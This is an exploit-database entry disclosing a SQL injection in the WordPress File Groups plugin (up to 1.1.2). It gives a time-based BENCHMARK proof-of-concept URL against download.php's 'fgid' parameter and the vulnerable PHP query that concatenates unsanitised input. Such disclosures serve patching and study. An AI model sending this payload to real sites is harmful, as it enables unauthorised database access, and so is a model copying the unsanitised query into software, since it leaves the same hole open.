ID 1337DAY-ID-16705
Type zdt
Reporter Miroslav Stampar
Modified 2011-08-17T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip
# Version: 1.1.2 (tested)
---
PoC
---
http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121)))
---------------
Vulnerable code
---------------
$fgid = $_GET['fgid'];
...
$file_list = $wpdb->get_col("select guid from wp_posts where post_parent = $fgid");
# 0day.today [2018-01-02] #
{"id": "1337DAY-ID-16705", "lastseen": "2018-01-02T15:10:23", "viewCount": 5, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-01-02T15:10:23", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16705", "SECURITYVULNS:DOC:1674"]}, {"type": "metasploit", "idList": ["MSF:ENCODER/GENERIC/NONE"]}], "modified": "2018-01-02T15:10:23", "rev": 2}, "vulnersScore": 0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16705", "description": "Exploit for php platform in category web applications", "title": "WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability", "cvelist": [], "sourceData": "# Exploit Title: WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability\r\n# Date: 2011-08-17\r\n# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)\r\n# Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip\r\n# Version: 1.1.2 (tested)\r\n \r\n---\r\nPoC\r\n---\r\nhttp://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121)))\r\n \r\n---------------\r\nVulnerable code\r\n---------------\r\n$fgid = $_GET['fgid'];\r\n \r\n...\r\n \r\n$file_list = $wpdb->get_col(\"select guid from wp_posts where post_parent = $fgid\");\r\n\r\n\n\n# 0day.today [2018-01-02] #", "published": "2011-08-17T00:00:00", "references": [], "reporter": "Miroslav Stampar", "modified": "2011-08-17T00:00:00", "href": "https://0day.today/exploit/description/16705"}
{}